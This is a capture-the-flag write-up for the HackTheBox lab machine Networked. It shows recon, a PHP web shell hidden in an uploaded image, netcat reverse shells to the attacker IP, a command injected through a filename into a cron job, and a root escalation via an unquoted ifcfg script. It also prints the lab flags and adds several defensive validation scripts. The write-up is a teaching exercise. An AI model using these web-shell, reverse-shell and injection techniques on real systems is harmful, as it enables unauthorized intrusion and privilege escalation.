# Networked

Networked is an easy-rated Linux machine from [HackTheBox](https://app.hackthebox.com/machines/203), created by guly. In this post my IP is 10.10.14.56 and the target IP is 10.129.170.0.

There is nothing complex in Networked: a file upload bypass leads to code execution (several techniques work here because of the lack of sanitization). Inside the machine you exploit a cron job and then a poorly configured network configuration script.

### Recon

The first steps are about gathering basic information about the target, using nmap and looking at the website.

{% code title="Local Terminal" %}

```bash
$ ping -c 1 10.129.170.0

Pinging 10.129.170.0 with 32 bytes of data:
Reply from 10.129.170.0: bytes=32 time=180ms TTL=63
Reply from 10.129.170.0: bytes=32 time=160ms TTL=63
Reply from 10.129.170.0: bytes=32 time=165ms TTL=63
Reply from 10.129.170.0: bytes=32 time=189ms TTL=63

Ping statistics for 10.129.170.0:
    Packets: Sent = 4, Received = 4, Lost = 0 (0% loss),
Approximate round trip times in milli-seconds:
    Minimum = 160ms, Maximum = 189ms, Average = 173ms
```

{% endcode %}

A TTL of 63 (64 minus one hop) suggests a Linux machine.

{% code title="Local Terminal" %}

```bash
$ nmap -p- --open -sS --min-rate 5000 -vvv -n 10.129.170.0

Nmap scan report for 10.129.170.0
Host is up, received echo-reply ttl 63 (0.19s latency).
Scanned at 2023-06-09 10:08:48 Pacific SA Standard Time for 27s
Not shown: 65500 filtered tcp ports (no-response), 32 filtered tcp ports (host-prohibited), 1 closed tcp port (reset)
Some closed ports may be reported as filtered due to --defeat-rst-ratelimit
PORT   STATE SERVICE REASON
22/tcp open  ssh     syn-ack ttl 63
80/tcp open  http    syn-ack ttl 63

Read data files from: C:\Program Files (x86)\Nmap
Nmap done: 1 IP address (1 host up) scanned in 27.10 seconds
           Raw packets sent: 131055 (5.766MB) | Rcvd: 47 (2.932KB)
```

{% endcode %}

{% code title="Local Terminal" %}

```bash
$ nmap -sCV -p 22,80 10.129.170.0

Nmap scan report for 10.129.170.0
Host is up (0.18s latency).

PORT   STATE SERVICE VERSION
22/tcp open  ssh     OpenSSH 7.4 (protocol 2.0)
| ssh-hostkey:
|   2048 22:75:d7:a7:4f:81:a7:af:52:66:e5:27:44:b1:01:5b (RSA)
|   256 2d:63:28:fc:a2:99:c7:d4:35:b9:45:9a:4b:38:f9:c8 (ECDSA)
|_  256 73:cd:a0:5b:84:10:7d:a7:1c:7c:61:1d:f5:54:cf:c4 (ED25519)
80/tcp open  http    Apache httpd 2.4.6 ((CentOS) PHP/5.4.16)
|_http-title: Site doesn't have a title (text/html; charset=UTF-8).
|_http-server-header: Apache/2.4.6 (CentOS) PHP/5.4.16

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 13.18 seconds
```

{% endcode %}

What we know so far: SSH on port 22 (OpenSSH 7.4) and a website on port 80 served by Apache 2.4.6 with PHP 5.4.16 on CentOS.

{% code title="Local Terminal" %}

```bash
$ whatweb 10.129.170.0
http://10.129.170.0 [200 OK] Apache[2.4.6], Country[RESERVED][ZZ], 
HTTPServer[CentOS][Apache/2.4.6 (CentOS) PHP/5.4.16], IP[10.129.170.0], 
PHP[5.4.16], X-Powered-By[PHP/5.4.16]
```

{% endcode %}

* Browser > <http://10.129.170.0>

<figure><img src="https://937334506-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FNqjbvJ4m6enB6HiVWSTQ%2Fuploads%2FdehFQ7U1KiFqBapkG9DQ%2Fimage.png?alt=media&#x26;token=c55b0033-9e53-41a5-b4f4-7bb27dde8cdd" alt=""><figcaption><p>Nothing relevant</p></figcaption></figure>

{% code title="Local Terminal" %}

```bash
wfuzz -c -t 200 --hc=404 -w /shared/wordlists/dirbuster/directory-list-2.3-medium.txt http://10.129.170.0/FUZZ
```

{% endcode %}

```bash
********************************************************
* Wfuzz 3.1.0 - The Web Fuzzer                         *
********************************************************

Target: http://10.129.170.0/FUZZ
Total requests: 220546

=====================================================================
ID           Response   Lines    Word       Chars       Payload
=====================================================================

000000150:   301        7 L      20 W       236 Ch      "uploads"
000001612:   301        7 L      20 W       235 Ch      "backup"
```

* /uploads/ > Nothing
* /backup/ > There is a file, **backup.tar**; inside it you can find four files: index.php, lib.php, photos.php and upload.php
  * index.php > Front page
  * lib.php > Nothing
  * photos.php > Photo gallery; if you can upload, this will be useful.
  * upload.php > You can upload files; this is the most valuable place for now.

### Reverse Shell \[apache]

Go to **<http://10.129.170.0/upload.php>** and upload any image.

<figure><img src="https://937334506-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FNqjbvJ4m6enB6HiVWSTQ%2Fuploads%2F5l9NHmjBU6IAV5Jnwt7f%2Fimage.png?alt=media&#x26;token=1439194e-5298-40e1-8d90-7c51f19b7d20" alt=""><figcaption><p><a href="http://10.129.170.0/photos.php">http://10.129.170.0/photos.php</a></p></figcaption></figure>

As you can see, the uploaded images are displayed; this is what we want to exploit. Intercept a file upload.

<figure><img src="https://937334506-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FNqjbvJ4m6enB6HiVWSTQ%2Fuploads%2Fvf3Gt8APRIkVjOcQ91P8%2Fimage.png?alt=media&#x26;token=d1559fc5-461f-473a-aa0f-cecc9842d233" alt=""><figcaption><p>Interception result, it shows the uploaded file in a raw format</p></figcaption></figure>

Now that we know files can be uploaded, our best option is to inject PHP code. Add `<?php system($_GET['cmd']); ?>` on the 3rd line (or anywhere in the file) and upload the image.

<figure><img src="https://937334506-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FNqjbvJ4m6enB6HiVWSTQ%2Fuploads%2FncB7sCjXHQn0nt0dhRrT%2Fimage.png?alt=media&#x26;token=b473ceb9-d1a9-4895-8de5-22fb0d4d461c" alt=""><figcaption><p>Sample with the payload</p></figcaption></figure>

* Browser > <http://10.129.170.0/photos.php>

<figure><img src="https://937334506-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FNqjbvJ4m6enB6HiVWSTQ%2Fuploads%2FyXCb8Gpw2YU0JjeFIqnp%2Fimage.png?alt=media&#x26;token=19b8549d-ea3a-45e5-bd38-e362e3cd29e4" alt=""><figcaption></figcaption></figure>

Nothing here, but earlier, while fuzzing, we found an empty directory called /uploads/.

* Browser > <http://10.129.170.0/uploads/10_10_14_56.jpg>

<figure><img src="https://937334506-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FNqjbvJ4m6enB6HiVWSTQ%2Fuploads%2FRnvAPv9WYdQn2v1qGE0Y%2Fimage.png?alt=media&#x26;token=5cd04bc8-d7aa-4f3a-9008-9d210bcdf025" alt=""><figcaption></figcaption></figure>

The image is served on its own, so we can pass commands through 'cmd' to the copy uploaded under the .php.jpg name.

* Browser > <http://10.129.170.0/uploads/10_10_14_56.php.jpg?cmd=id>

<figure><img src="https://937334506-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FNqjbvJ4m6enB6HiVWSTQ%2Fuploads%2FwGlCAMdlKeucZuVvcjRT%2Fimage.png?alt=media&#x26;token=bf13fdc8-4fab-4ebe-885d-2f093e7ab373" alt=""><figcaption></figcaption></figure>

It works; let's connect through netcat.

{% code title="Local Terminal" %}

```bash
nc -nlvp 443
```

{% endcode %}

* Browser > `http://10.129.170.0/uploads/10_10_14_56.php.jpg?cmd=nc -e /bin/bash 10.10.14.56 443`

And we are in! Let's do a [bash upgrade](https://robertos-notebook.gitbook.io/cybersecurity/cybersecurity/tip-and-tricks/bash-upgrade).
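As an added example (not code from the machine's upload.php or its author), here is the server-side validation a defender would want for an upload like the one above: a name check that refuses double extensions such as `.php.jpg`, and a magic-byte check that shows why a valid image header alone proves nothing. The function names and the sample files are constructed for the example.

```shell
#!/bin/sh
# Added example, not code from the machine's upload.php: server-side
# checks for an upload such as 10_10_14_56.php.jpg.
# Two lessons from this box: (1) validate the whole name, not just the
# last extension, and (2) image magic bytes say nothing about what else
# the file contains, so the uploads directory must never execute PHP
# (e.g. "php_admin_flag engine off" for /uploads in Apache/mod_php).

# Accept only names like 10_10_14_56.jpg: safe characters, one dot and
# an image extension. A name with two dots (x.php.jpg) is refused
# because a handler matched on ".php" anywhere in the name would run it.
check_upload_name() {
    case "$1" in
        ''|.*|*.*.*) return 1 ;;                 # empty, hidden, double extension
        *[!a-zA-Z0-9_.-]*) return 1 ;;           # characters outside the allowlist
        *.jpg|*.jpeg|*.png|*.gif) return 0 ;;    # permitted image extensions
    esac
    return 1
}

# Magic-byte check on the first four bytes (JPEG ff d8 ff, PNG 89 50 4e 47).
# Useful only as a second line of defence: a file can start with a valid
# header and still carry <?php ... ?> further down, exactly as on this box.
has_image_magic() {
    sig=$(head -c 4 "$1" | od -An -tx1 | tr -d ' \n')
    case "$sig" in
        ffd8ff*) return 0 ;;
        89504e47) return 0 ;;
    esac
    return 1
}

# Combined decision: both the name and the content must pass.
accept_upload() {
    n=${1##*/}
    check_upload_name "$n" && has_image_magic "$1"
}
```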

### User Pivot \[Guly]

Basic scouting

{% code title="Target Terminal \[apache]" %}

```bash
bash-4.2$ id
uid=48(apache) gid=48(apache) groups=48(apache)

bash-4.2$ whoami
apache

bash-4.2$ hostname -I
10.129.170.0 dead:beef::250:56ff:feb9:94b9

bash-4.2$ cd /home
bash-4.2$ ls
guly
```

{% endcode %}

So there is one user; maybe we can enter that folder.

{% code title="Target Terminal \[apache]" %}

```bash
bash-4.2$ cd guly              # :o
bash-4.2$ ls
check_attack.php  crontab.guly  user.txt

bash-4.2$ cat user.txt         # :(
cat: user.txt: Permission denied
```

{% endcode %}

OK, we need to become another user...

{% code title="Target Terminal \[apache]" %}

```bash
$ cat crontab.guly
*/3 * * * * php /home/guly/check_attack.php

$ ls -l
total 12
-r--r--r--. 1 root root 782 Oct 30  2018 check_attack.php
```

{% endcode %}

This is interesting: the crontab runs check\_attack.php every 3 minutes as another user (guly).

```bash
$ cat check_attack.php
```

{% code title="check\_attack.php" %}

```php
<?php
require '/var/www/html/lib.php';
$path = '/var/www/html/uploads/'; # Take note of the PATH!
$logpath = '/tmp/attack.log';
$to = 'guly';
$msg= '';
$headers = "X-Mailer: check_attack.php\r\n";

$files = array();
$files = preg_grep('/^([^.])/', scandir($path));

foreach ($files as $key => $value) {
        $msg='';
  if ($value == 'index.html') {
        continue;
  }
  #echo "-------------\n";

  #print "check: $value\n";
  list ($name,$ext) = getnameCheck($value);
  $check = check_ip($name,$value);

  if (!($check[0])) {
    echo "attack!\n";
    # todo: attach file
    file_put_contents($logpath, $msg, FILE_APPEND | LOCK_EX);

    exec("rm -f $logpath");
    exec("nohup /bin/rm -f $path$value > /dev/null 2>&1 &");
    echo "rm -f $path$value\n"; # It removes directly, maybe we can inject commands
    mail($to, $msg, $msg, $headers, "-F$value");
  }
}

?>
```

{% endcode %}

{% code title="Target Terminal \[apache]" %}

```bash
bash-4.2$ ls -l
total 12
-r--r--r--. 1 root root 782 Oct 30  2018 check_attack.php
```

{% endcode %}

And the file itself is owned by root and read-only, so we can't edit the script; we have to abuse what it does with the files in the uploads folder instead.
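As an added example (not code from the machine or its author), a POSIX shell version of what check\_attack.php should have done with the filenames it finds in the uploads folder: flag names outside a safe allowlist, and delete by passing the name as one quoted argument instead of interpolating it into a command string. The function names are mine, and the directory and file names used in the test are constructed.

```shell
#!/bin/sh
# Added example, not from the machine: the shell-side lesson from
# check_attack.php. The script runs exec("rm -f $path$value") with the
# upload's raw filename, so a name containing ';' is parsed by the shell
# as a second command. Quoting the path and passing "--" makes any name
# inert; in PHP the equivalent fix is unlink() or escapeshellarg().

# Allowlist for upload names: the gallery only needs letters, digits,
# '_', '.' and '-' (e.g. 10_10_14_56.jpg or 127_0_0_1.png).
is_safe_upload_name() {
    case "$1" in
        ''|.*) return 1 ;;                   # empty or hidden
        *[!a-zA-Z0-9_.-]*) return 1 ;;      # anything outside the allowlist
    esac
    return 0
}

# Detection: print the names in an uploads directory that would have
# reached the shell unquoted. A non-empty result is worth an alert,
# whether or not the cron job ever deletes the file.
scan_uploads() {
    for f in "$1"/*; do
        [ -e "$f" ] || continue
        name=${f##*/}
        is_safe_upload_name "$name" || printf '%s\n' "$name"
    done
}

# Safe deletion: the name is a single quoted argument and "--" stops rm
# from treating a leading '-' as an option. No shell parsing of the
# filename happens, so metacharacters in it are just characters.
safe_remove_upload() {
    rm -f -- "$1/$2"
}
```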

{% code title="Target Terminal \[apache]" %}

```bash
cd /var/www/html/uploads/
```

{% endcode %}

Open a new local terminal and prepare a listening netcat.

{% code title="Local Terminal" %}

```bash
nc -nlvp 444
```

{% endcode %}

{% code title="Target Terminal \[apache]" %}

```bash
bash-4.2$ touch '; nc -c bash 10.10.14.56 444'
bash-4.2$ ls -l

total 116
-rw-r--r--  1 apache apache 46961 Jun  9 21:57 10_10_14_56.jpg
-rw-r--r--  1 apache apache 46961 Jun  9 22:34 10_10_14_56.php.jpg
-rw-r--r--. 1 root   root    3915 Oct 30  2018 127_0_0_1.png
-rw-r--r--. 1 root   root    3915 Oct 30  2018 127_0_0_2.png
-rw-r--r--. 1 root   root    3915 Oct 30  2018 127_0_0_3.png
-rw-r--r--. 1 root   root    3915 Oct 30  2018 127_0_0_4.png
-rw-r--r--  1 apache apache     0 Jun  9 22:55 ; nc -c bash 10.10.14.56 444
-r--r--r--. 1 root   root       2 Oct 30  2018 index.html
```

{% endcode %}

And there is our file... now we wait; crontab.guly says the script runs every 3 minutes.

Apply a bash upgrade and continue.

{% code title="Target Terminal \[guly]" %}

```bash
[guly@networked ~]$ cat /home/guly/user.txt
70680e5809fd6d3350e0c432938dd588
```

{% endcode %}

### Privilege Escalation

{% code title="Target Terminal \[guly]" %}

```bash
[guly@networked ~]$ id
uid=1000(guly) gid=1000(guly) groups=1000(guly)

[guly@networked ~]$ sudo -l
Matching Defaults entries for guly on networked:
    !visiblepw, always_set_home, match_group_by_gid, always_query_group_plugin, env_reset, env_keep="COLORS DISPLAY HOSTNAME HISTSIZE KDEDIR
    LS_COLORS", env_keep+="MAIL PS1 PS2 QTDIR USERNAME LANG LC_ADDRESS LC_CTYPE", env_keep+="LC_COLLATE LC_IDENTIFICATION LC_MEASUREMENT
    LC_MESSAGES", env_keep+="LC_MONETARY LC_NAME LC_NUMERIC LC_PAPER LC_TELEPHONE", env_keep+="LC_TIME LC_ALL LANGUAGE LINGUAS _XKB_CHARSET
    XAUTHORITY", secure_path=/sbin\:/bin\:/usr/sbin\:/usr/bin

User guly may run the following commands on networked:
    (root) NOPASSWD: /usr/local/sbin/changename.sh
```

{% endcode %}

Looks like we can execute that custom .sh file as root; let's see what's inside.

{% code title="Target Terminal \[guly]" %}

```bash
cat /usr/local/sbin/changename.sh
```

{% endcode %}

```bash
#!/bin/bash -p
cat > /etc/sysconfig/network-scripts/ifcfg-guly << EoF # Writes the base ifcfg-guly file into the network-scripts folder.
DEVICE=guly0
ONBOOT=no
NM_CONTROLLED=no
EoF

regexp="^[a-zA-Z0-9_\ /-]+$"

for var in NAME PROXY_METHOD BROWSER_ONLY BOOTPROTO; do # The script prompts the user for each value
        echo "interface $var:"
        read x # We can inject a command here: the regexp allows spaces
        while [[ ! $x =~ $regexp ]]; do
                echo "wrong input, try again"
                echo "interface $var:"
                read x
        done
        echo $var=$x >> /etc/sysconfig/network-scripts/ifcfg-guly # Appended unquoted
done

/sbin/ifup guly0
```

The values are appended to ifcfg-guly unquoted, and ifup later sources that file as root, so a value containing a space such as `a bash` ends up as the line `NAME=a bash`, which runs `bash` as root.
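As an added example (not the machine's changename.sh), here is how the script's value check and file writing could have been done safely: a validator that rejects spaces and shell metacharacters outright, and a writer that emits a quoted assignment. The function names are mine, the four values are read from arguments instead of `read` so the block runs non-interactively, and the target file is a constructed temp file in the test.

```shell
#!/bin/sh
# Added example, not the machine's changename.sh: a stricter check for
# the values the script appends to ifcfg-guly, and a writer that quotes
# them. changename.sh allows spaces in its regexp and appends "$var=$x"
# unquoted; because ifup sources the ifcfg file as root, "a bash" becomes
# a command line instead of a value.

# Accept exactly one token of letters, digits, '_' and '-': no spaces,
# no '/', nothing a sourcing shell could parse as a second word.
validate_ifcfg_value() {
    [ -n "$1" ] || return 1
    case "$1" in
        *[!a-zA-Z0-9_-]*) return 1 ;;
    esac
    return 0
}

# Append VAR="value" to the target file, only for validated values, and
# with the value double-quoted so the sourced line is a plain assignment.
write_ifcfg_value() {
    file=$1 var=$2 value=$3
    validate_ifcfg_value "$value" || return 1
    printf '%s="%s"\n' "$var" "$value" >> "$file"
}

# Non-interactive version of the script's loop: the four values come
# from the arguments (NAME PROXY_METHOD BROWSER_ONLY BOOTPROTO order)
# and the whole write fails on the first invalid value.
build_ifcfg() {
    file=$1; shift
    : > "$file"
    for var in NAME PROXY_METHOD BROWSER_ONLY BOOTPROTO; do
        write_ifcfg_value "$file" "$var" "$1" || return 1
        shift
    done
}
```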

{% code title="Target Terminal \[guly]" %}

```bash
[guly@networked ~]$ sudo /usr/local/sbin/changename.sh
interface NAME:
a bash # type this
interface PROXY_METHOD:
a
interface BROWSER_ONLY:
a
interface BOOTPROTO:
a
```

{% endcode %}

{% code title="Target Terminal \[root]" %}

```bash
[root@networked network-scripts]$ cat /root/root.txt
666702788dadb24f434a7dde10258ce5
```

{% endcode %}
